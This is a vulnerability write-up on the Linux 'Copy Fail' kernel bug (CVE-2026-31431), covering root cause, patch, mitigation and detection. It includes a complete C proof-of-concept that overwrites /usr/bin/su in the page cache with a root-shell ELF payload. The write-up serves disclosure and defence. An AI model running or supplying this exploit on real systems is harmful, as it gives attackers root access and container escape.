CopyFail (CVE-2026-31431): A 4-Byte Page Cache Write That Gives You Root
May 1, 2026
Author

Ravindu Wickramasinghe
@rvz

CVE-2026-31431 - A logic bug in the Linux kernel that lets any unprivileged user silently modify the in-memory copy of any readable file, including setuid binaries like /usr/bin/su. Replace su's code in memory with a payload that calls setuid(0) + execve("/bin/sh"), run su, get root. No race condition, no kernel offsets, no recompilation. Works on most major distros since 2017.
Discovered by Xint Code / Theori. This post breaks down the root cause and how the exploit actually works.
Why This One Is Different
Linux kernel privilege escalations aren't new. Dirty Cow (CVE-2016-5195) needed a race condition in copy-on-write and could destabilize the system. Dirty Pipe (CVE-2022-0847) was deterministic but only affected kernels 5.8 through 5.16.11 and required precise pipe buffer state manipulation.
Copy Fail is none of that. It's a deterministic logic flaw. No race to win, no system crash risk. Any kernel 4.14+ (December 2017 onward) with the algif_aead module available is affected. The same exploit binary works across Ubuntu, RHEL, Amazon Linux, SUSE, and most other distros without modification.
The short version: Linux has a feature called AF_ALG that lets any user access the kernel's crypto operations through a socket. There's also splice(), a syscall that moves file data between file descriptors without copying it - it just passes references to the kernel's in-memory copy of the file (the page cache). And there's authencesn, a crypto algorithm that writes 4 bytes into the destination buffer's tag region as part of its sequence number handling — harmless when the destination is a normal buffer, catastrophic when page cache pages end up in it.
Chain these three together: splice a file's page cache pages into an AF_ALG crypto socket, trigger the authencesn bug, and those 4 bytes land directly in the kernel's cached copy of the file. You control which file, which offset, and which 4 bytes. That's an arbitrary write to any readable file's in-memory copy - game over.
Exploit flow: AF_ALG socket, splice, authencesn scratch write, execve
The Three Ingredients
To understand Copy Fail, you need three pieces. Each one is harmless alone. The vulnerability only exists at their intersection.
1. AF_ALG - Kernel Crypto for Everyone
AF_ALG is a socket type (socket family 38) that exposes the kernel's crypto API to unprivileged userspace. Think of it like opening a raw socket, but instead of networking, you get access to kernel crypto operations. Any user can open one, bind it to an AEAD template like authencesn(hmac(sha256),cbc(aes)), and run encryption or decryption. No capabilities needed. AEAD stands for Authenticated Encryption with Associated Data - it's a crypto mode that encrypts data and verifies integrity in one operation, commonly used in IPsec and TLS.
# Open an AF_ALG socket - no privileges requiredimport socketa = socket.socket(38, 5, 0) # AF_ALG, SOCK_SEQPACKETa.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))2. splice() - Zero-Copy File I/O
First, a quick note on the page cache: when Linux reads a file from disk, it keeps a copy in memory so future reads are fast. This in-memory copy is the page cache. When you run execve() on a binary, the kernel loads it from the page cache, not from disk. Every process on the system sees the same cached pages.
splice() transfers data between file descriptors and pipes without copying. Normally when you read() a file, the kernel copies data from the page cache into your userspace buffer. splice() skips that copy - it passes page cache pages by reference. The destination gets pointers to the exact same physical pages that back every read(), mmap(), and execve() of that file.
When you splice a file into an AF_ALG socket, the socket's input scatterlist (a kernel data structure that describes a list of memory regions for DMA/crypto operations) holds direct references to the kernel's cached pages. This is the efficiency optimization that makes the bug possible.
3. authencesn - The One That Breaks the Rules
authencesn is an AEAD wrapper used by IPsec for Extended Sequence Numbers. The details of why it exists don't matter much here - what matters is what it does wrong.
During decryption, authencesn needs to shuffle sequence number bytes for its HMAC calculation. To do this, it uses the destination buffer as scratch space, writing 4 bytes (seqno_lo - the low 4 bytes of the extended sequence number) at offset assoclen + cryptlen in the destination scatterlist. This is normal for authencesn — when the destination is a kernel-allocated buffer (as in IPsec's xfrm layer), the write lands in memory the algorithm owns. The problem is when the destination scatterlist contains pages it shouldn't — like page cache pages from splice().
// Inside crypto_authenc_esn_decrypt():scatterwalk_map_and_copy(tmp, dst, 0, 8, 0); // read AAD bytes 0-7scatterwalk_map_and_copy(tmp, dst, 4, 4, 1); // overwrite dst[4..7]scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 1); // WRITE PAST BOUNDARY// ^^^^^^^^^^^^^^^^^^^^^^// This writes into memory the algorithm doesn't ownMost AEAD algorithms in the kernel only read the tag region during decryption. GCM, CCM, and regular authenc all confine writes to the legitimate output area. authencesn is unusual in that it treats the destination as a read-write scratch buffer, writing into the tag region as part of its sequence number manipulation.
The Root Cause: Page Cache Pages in the Writable Scatterlist
In 2017, an optimization was added to algif_aead.c (commit 72548b093ee3) to perform AEAD operations in-place. Before this, the input scatterlist (req->src, where the data comes from) and the output scatterlist (req->dst, where results go) were separate. Page cache pages from splice lived in src (read-only). The user's buffer was in dst (writable). Safe.
The optimization changed this: it copied the data portion from input to output, but linked the authentication tag pages by reference using sg_chain() (a kernel function that connects two scatterlists so they appear as one continuous memory region). Then it passed the same scatterlist as both source and destination to aead_request_set_crypt() - making the operation in-place. Now page cache pages from splice() were part of the writable destination scatterlist.
Scatterlist layout before and after the 2017 in-place optimization
When authencesn writes its 4-byte seqno_lo at dst[assoclen + cryptlen], the write crosses from the user's buffer into the linked page cache pages. The kernel walks through the combined scatterlist, maps the page cache page into memory, and writes directly into the cached copy of the target file.
The HMAC check then runs and fails (the ciphertext is fabricated), so recvmsg() returns an error. But the 4-byte write persists. The original bytes are never restored.
What the Attacker Controls
This isn't just a corruption primitive. The attacker has precise control over three things:
- Which file: Any file readable by the current user. The attacker splices the target file into the AF_ALG socket.
- Which offset: The splice offset, splice length, and
assoclen(the associated data length parameter passed to the AEAD operation) determine exactly which 4 bytes within the file's page cache get overwritten. - Which value: The 4-byte overwrite value comes from bytes 4-7 of the AAD, constructed by the attacker in
sendmsg().
Controlled file + controlled offset + controlled value = arbitrary 4-byte write to the page cache of any readable file. That's a game-ending primitive.
The Exploit: From Logic Bug to Root Shell
The default exploit path targets /usr/bin/su, a setuid-root binary present on most Linux distros. The exploit replaces the beginning of su in the page cache with a minimal 160-byte ELF binary that does setuid(0) + execve("/bin/sh"), then runs su to trigger it.
Step 1: Open the AF_ALG Socket
Bind to authencesn(hmac(sha256),cbc(aes)), set a key, accept a request socket. No privileges needed. AF_ALG is available to unprivileged users by default on most distros that ship algif_aead as a built-in or autoloaded module.
Step 2: Construct the Write
For each 4-byte chunk of the ELF payload, construct a sendmsg() + splice() pair. The sendmsg provides the AAD where bytes 4-7 carry the 4 bytes to write. The splice feeds the target file's page cache pages as ciphertext and tag.
Step 3: Trigger the Write
recv() triggers the decrypt operation. Inside authencesn, the kernel writes seqno_lo at dst[assoclen + cryptlen]. The scatterwalk crosses into the page cache. Four bytes are written. HMAC fails. recvmsg returns an error. The page cache is corrupted.
Step 4: Get Root
After all payload chunks are written, run su. The kernel loads the binary from the page cache, which now contains the minimal ELF payload instead of the real su binary. Because su is setuid-root, the payload's setuid(0) + execve("/bin/sh") runs as root.
Use responsibly. Run only on systems you own or have written authorization to test. This corrupts the page cache of a setuid binary. The resulting root shell is real.
The Exploit Code
Below is a C implementation of the exploit (source on GitHub, also available in Python). The payload is a 160-byte minimal ELF binary (extracted from Theori's published PoC) that replaces /usr/bin/su from byte 0 in the page cache. It doesn't inject shellcode at a specific offset - it overwrites the entire ELF header and entry point so the kernel's ELF loader executes setuid(0) + execve("/bin/sh") when su is run. This is why it works across distros without per-binary offsets. Verified on Ubuntu 24.04 LTS, kernel 6.17.0-1012-aws.
#define _GNU_SOURCE#include <stdio.h>#include <stdlib.h>#include <string.h>#include <unistd.h>#include <fcntl.h>#include <sys/socket.h>#include <linux/if_alg.h>
#define SOL_ALG 279#define TARGET "/usr/bin/su"
// minimal ELF: setuid(0) + execve("/bin/sh")// overwrites the target binary from byte 0 in the page cacheunsigned char payload[] = { 0x7f,0x45,0x4c,0x46,0x02,0x01,0x01,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x02,0x00,0x3e,0x00,0x01,0x00,0x00,0x00, 0x78,0x00,0x40,0x00,0x00,0x00,0x00,0x00, 0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x40,0x00,0x38,0x00, 0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x01,0x00,0x00,0x00,0x05,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00, 0x9e,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x9e,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00, 0x31,0xc0,0x31,0xff,0xb0,0x69,0x0f,0x05, 0x48,0x8d,0x3d,0x0f,0x00,0x00,0x00,0x31, 0xf6,0x6a,0x3b,0x58,0x99,0x0f,0x05,0x31, 0xff,0x6a,0x3c,0x58,0x0f,0x05,0x2f,0x62, 0x69,0x6e,0x2f,0x73,0x68,0x00,0x00,0x00,};
// write 4 bytes into the page cache at the given offsetvoid write4(int fd, int offset, void *value) { struct sockaddr_alg sa = { AF_ALG, "aead", 0, 0, "authencesn(hmac(sha256),cbc(aes))" };
int af = socket(AF_ALG, SOCK_SEQPACKET, 0); bind(af, (void *)&sa, sizeof sa);
// dummy key - the value doesn't matter, HMAC will fail anyway char key[40] = {8, 0, 1, 0, 0, 0, 0, 16}; setsockopt(af, SOL_ALG, ALG_SET_KEY, key, 40); setsockopt(af, SOL_ALG, ALG_SET_AEAD_AUTHSIZE, NULL, 4);
int req = accept(af, 0, 0); int n = offset + 4;
// AAD bytes 4-7 become seqno_lo - this is what gets written to the page cache unsigned char aad[8] = {0x41, 0x41, 0x41, 0x41}; memcpy(aad + 4, value, 4);
// cmsg headers configure the AEAD operation unsigned char op[4] = {0}; // ALG_OP_DECRYPT unsigned char iv[20] = {0x10}; // ivlen=16, 16 zero bytes unsigned char al[4] = {8}; // assoclen=8
struct iovec iov = {aad, 8}; char cbuf[CMSG_SPACE(4) + CMSG_SPACE(20) + CMSG_SPACE(4)]; memset(cbuf, 0, sizeof cbuf); struct msghdr msg = {.msg_iov = &iov, .msg_iovlen = 1, .msg_control = cbuf, .msg_controllen = sizeof cbuf};
struct cmsghdr *cm = CMSG_FIRSTHDR(&msg); cm->cmsg_level = SOL_ALG; cm->cmsg_type = ALG_SET_OP; cm->cmsg_len = CMSG_LEN(4); memcpy(CMSG_DATA(cm), op, 4);
cm = CMSG_NXTHDR(&msg, cm); cm->cmsg_level = SOL_ALG; cm->cmsg_type = ALG_SET_IV; cm->cmsg_len = CMSG_LEN(20); memcpy(CMSG_DATA(cm), iv, 20);
cm = CMSG_NXTHDR(&msg, cm); cm->cmsg_level = SOL_ALG; cm->cmsg_type = ALG_SET_AEAD_ASSOCLEN; cm->cmsg_len = CMSG_LEN(4); memcpy(CMSG_DATA(cm), al, 4);
sendmsg(req, &msg, MSG_MORE);
// splice page cache pages into the crypto scatterlist (zero-copy) int p[2]; pipe(p); splice(fd, &(loff_t){0}, p[1], 0, n, 0); splice(p[0], 0, req, 0, n, 0);
// trigger decrypt - HMAC fails but the 4-byte write already landed char buf[4096]; recv(req, buf, 8 + offset, 0);
close(p[0]); close(p[1]); close(req); close(af);}
int main() { int chunks = (sizeof(payload) + 3) / 4;
printf("[*] CVE-2026-31431 - Copy Fail\n"); printf("[*] target: %s\n", TARGET); printf("[*] payload: %zu byte ELF (setuid(0) + execve('/bin/sh'))\n", sizeof(payload));
// check if AF_ALG + authencesn is available int test = socket(AF_ALG, SOCK_SEQPACKET, 0); if (test < 0) { printf("[!] AF_ALG not available - kernel may be patched or module not loaded\n"); return 1; } struct sockaddr_alg tsa = { AF_ALG, "aead", 0, 0, "authencesn(hmac(sha256),cbc(aes))" }; if (bind(test, (void *)&tsa, sizeof tsa) < 0) { printf("[!] authencesn bind failed - module not loaded\n"); close(test); return 1; } close(test); printf("[*] AF_ALG + authencesn available - system is vulnerable\n");
int fd = open(TARGET, O_RDONLY); if (fd < 0) { perror("[!] open failed"); return 1; } printf("[*] opened %s (fd=%d)\n", TARGET, fd);
for (int i = 0; i < (int)sizeof(payload); i += 4) { write4(fd, i, payload + i); printf("[+] wrote 4 bytes to page cache at offset %d (%d/%d)\n", i, i/4 + 1, chunks); }
close(fd); printf("[*] page cache corrupted. executing %s...\n", TARGET); system("su");}gcc -o copy_fail copy_fail.c && ./copy_fail
PoC exploit running on Ubuntu 24.04 LTS, kernel 6.17.0-1012-aws
Page cache corruption path - disk stays clean, only the cached copy is modified
The Stealth Factor
The corrupted page is never marked dirty for writeback. The kernel's normal writeback machinery doesn't know the page was modified. This means:
- The file on disk remains unchanged
- Tools like
sha256sumread through the page cache, so they show the corrupted hash — not the clean on-disk copy. Only direct I/O (dd iflag=direct) bypasses the cache and reveals the untouched original - Every
read(),mmap(), andexecve()on the file serves the corrupted page cache version - The corruption persists until the page is evicted from cache or the system reboots
The page cache is also shared across the host. This means the corruption is visible to every process, including those in other containers. Copy Fail isn't just a local privilege escalation - it's a container escape primitive.
How This Stayed Hidden for 9 Years
The bug is a collision of three independent changes, each reasonable in isolation:
- 2011:
authencesnadded for IPsec ESN support. Uses destination buffer as scratch space. Harmless at the time - the only caller was the kernel's internal xfrm layer. - 2015: AF_ALG gains AEAD support with a
splice()path. But it uses out-of-place operation -req->srcandreq->dstare separate. Page cache pages are in src (read-only). Not yet exploitable. - 2017: The in-place optimization.
sg_chain()links page cache tag pages into the writable destination.req->src = req->dst. Now authencesn's scratch write crosses into page cache pages. The bug is born.
Nobody connected the 2017 in-place optimization to authencesn's scratch writes or to the splice path's use of page cache pages. The vulnerability exists at the intersection of all three, and was silently exploitable for nearly a decade.
Impact
The algif_aead module ships enabled in most major distro default kernel configs. The attack requires only an unprivileged local user account. Distros that don't build or autoload algif_aead are not affected.
| Environment | Risk | Impact |
|---|---|---|
| Multi-tenant hosts, jump boxes | High | Any user becomes root |
| Kubernetes / container clusters | High | Cross-container, cross-tenant escape |
| CI runners (GitHub Actions, GitLab) | High | A PR becomes root on the runner |
| Single-tenant servers | Medium | Internal LPE, chains with RCE |
| Single-user workstations | Lower | Post-exploitation step-up |
The Fix
The patch reverts algif_aead.c to out-of-place operation, removing the 2017 in-place optimization entirely. The input (req->src) now points to the source scatterlist where page cache pages live (read-only), and the output (req->dst) points to the user's receive buffer (writable, but no page cache pages). The sg_chain linking is removed entirely.
// Before (vulnerable): input and output point to the same scatterlistaead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src, // output scatterlist areq->first_rsgl.sgl.sgt.sgl, // output scatterlist (same!) used, ctx->iv);
// After (fixed): input and output are separateaead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src, // input (page cache pages - read only) areq->first_rsgl.sgl.sgt.sgl, // output (user buffer - writable) used, ctx->iv);As the commit message puts it: "There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings."
Remediation
Patch your kernel. Update your distribution's kernel package to one that includes mainline commit a664bf3d603d. Most major distributions are shipping the fix now.
Before you can patch: disable the algif_aead module:
# Disable the vulnerable moduleecho "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif-aead.confrmmod algif_aead 2>/dev/nullWhat does this break? For most systems - nothing. AF_ALG is a userspace front door to the kernel crypto API. In-kernel consumers like dm-crypt, kTLS, and IPsec call the crypto API directly without going through AF_ALG. Userspace tools like OpenSSL and SSH use their own crypto libraries by default. None of them depend on AF_ALG.
The only things affected are applications explicitly configured to use AF_ALG - like OpenSSL with the afalg engine enabled. Check with lsmod | grep algif (a nonzero reference count means something is actively using it).
For container/sandbox environments, block AF_ALG socket creation via seccomp regardless of patch state.
Detection: Finding Page Cache Tampering
The exploit's stealth comes from the page cache being volatile — the corrupted pages are never marked dirty for writeback, so the file on disk stays clean. sha256sum /usr/bin/su reads from the page cache, so it returns the corrupted hash. Standard file integrity tools like AIDE or Tripwire also read via the page cache, meaning they'd see the corruption — but only if they re-check after exploitation, not by comparing to on-disk state.
The reliable detection technique is comparing a buffered read against a direct I/O read of the same file. Direct I/O (O_DIRECT) bypasses the page cache entirely and reads raw blocks from disk:
# Buffered read (goes through page cache - shows corrupted content)sha256sum /usr/bin/su# → 44900c63... (WRONG - this is the injected ELF)# Direct I/O read (bypasses page cache - reads from disk)dd if=/usr/bin/su bs=4096 iflag=direct 2>/dev/null | sha256sum# → c74311fe... (CORRECT - the real binary)# If these two differ → page cache has been tampered withThis divergence is the smoking gun. For static binaries like setuid executables, buffered and direct I/O reads always produce identical hashes under normal operations. A mismatch means something wrote to the page cache without going through the filesystem — exactly what Copy Fail does. (Caveat: on btrfs, O_DIRECT reads on compressed extents fall back to buffered I/O, which would produce a false negative. ext4 and XFS handle O_DIRECT correctly.)
We verified this on AWS (Ubuntu 24.04, kernel 6.17.0-1012-aws). Before exploitation, both hashes match. After running the PoC, the buffered hash diverges while the direct I/O hash remains the original:
# Before exploitation - hashes match$ sha256sum /usr/bin/suc74311fe5636... /usr/bin/su$ dd if=/usr/bin/su bs=4096 iflag=direct 2>/dev/null | sha256sumc74311fe5636... -# After exploitation - page cache corrupted$ sha256sum /usr/bin/su44900c631391... /usr/bin/su ← CORRUPTED (page cache)$ dd if=/usr/bin/su bs=4096 iflag=direct 2>/dev/null | sha256sumc74311fe5636... - ← CLEAN (disk)Other detection vectors worth monitoring:
- Package integrity:
debsums -c(Debian/Ubuntu) orrpm -V(RHEL) will report the binary as modified since they read via the page cache and compare against the package database hash - AF_ALG socket creation: an
auditdrule onsocket(AF_ALG)will fire — this syscall is extremely rare on most systems since the kernel crypto API consumers (dm-crypt, IPsec, kTLS) don't use AF_ALG - Behavioral: unprivileged user suddenly holding a
uid=0shell. EDR/auditd catches thesetuid(0) + execvesequence from a process that shouldn't do that - Memory forensics: LiME + Volatility can inspect page cache pages directly and find the injected ELF payload in memory
What won't catch it: filesystem audit logs (no disk write occurred), file timestamps (stat shows no change), and standard kernel logs (no warnings generated by default).
Tooling
We've released three tools alongside the PoC in the GitHub repository:
Improved PoC (copy_fail.c / copy_fail.py)
The updated exploit adds responsible defaults that the original lacked:
--cleanup: evicts the corrupted page cache after exploitation viaposix_fadvise(POSIX_FADV_DONTNEED), restoring the clean on-disk binary.FADV_DONTNEEDis technically advisory, but on Linux it actively evicts clean (non-dirty) pages — which is exactly what the corrupted pages are, since the kernel never marks them dirty--check-only: tests if the system is vulnerable without actually exploiting it--target PATH: test against a different setuid binary- Signal handlers:
SIGINT/SIGTERMtrigger page cache eviction if interrupted mid-exploit (SIGKILLcannot be caught — useecho 3 > /proc/sys/vm/drop_cachesto recover in that case) - Forensic warnings: post-exploitation output explaining what artifacts remain
# Check vulnerability without exploiting./copy_fail --check-only# Exploit with automatic cleanup (restores clean binary after shell exits)./copy_fail --cleanup# Target a different binary./copy_fail --cleanup --target /usr/bin/sudoMitigation Script (copyfail_mitigate.sh)
Smart patching automation that assesses before acting:
- Detects if the system is vulnerable (kernel version + AF_ALG module check)
- Enumerates processes currently using AF_ALG sockets — so you can decide if it's safe to disable
- Recommends patched kernel versions per distro (Ubuntu, RHEL, Amazon Linux, Debian, SUSE)
- Applies mitigation: blacklists
algif_aeadvia modprobe.d and unloads the module - Generates a seccomp profile for blocking AF_ALG in containers
--dry-runmode to preview changes without applying
# Preview what the script would dosudo bash copyfail_mitigate.sh --dry-run# Apply mitigation (interactive confirmation)sudo bash copyfail_mitigate.sh# Auto-apply without promptssudo bash copyfail_mitigate.sh --yes# Generate seccomp profile for containersbash copyfail_mitigate.sh --seccompDetection Script (copyfail_detect.sh)
Checks for active or past exploitation:
- Page cache integrity: compares buffered vs direct I/O hashes for setuid binaries
- AF_ALG activity: checks for loaded module, active sockets, and socket-holding processes
- Package integrity: runs
debsums/rpm -Vagainst target binaries - Process lineage: scans for suspicious root shells spawned from unexpected parents
# Check /usr/bin/su onlysudo bash copyfail_detect.sh# Check all common setuid binariessudo bash copyfail_detect.sh --all --verboseAll tools are available in the repository. Tested on Ubuntu 24.04 LTS (kernel 6.17.0-1012-aws) on AWS EC2.
References
- copy.fail - Official disclosure page
- Xint Code write-up - Full technical deep-dive by the researchers
- GitHub PoC repository - Exploit source and issue tracker
- Kernel patch - Mainline fix commit
- 72548b093ee3 - The 2017 in-place optimization that introduced the bug
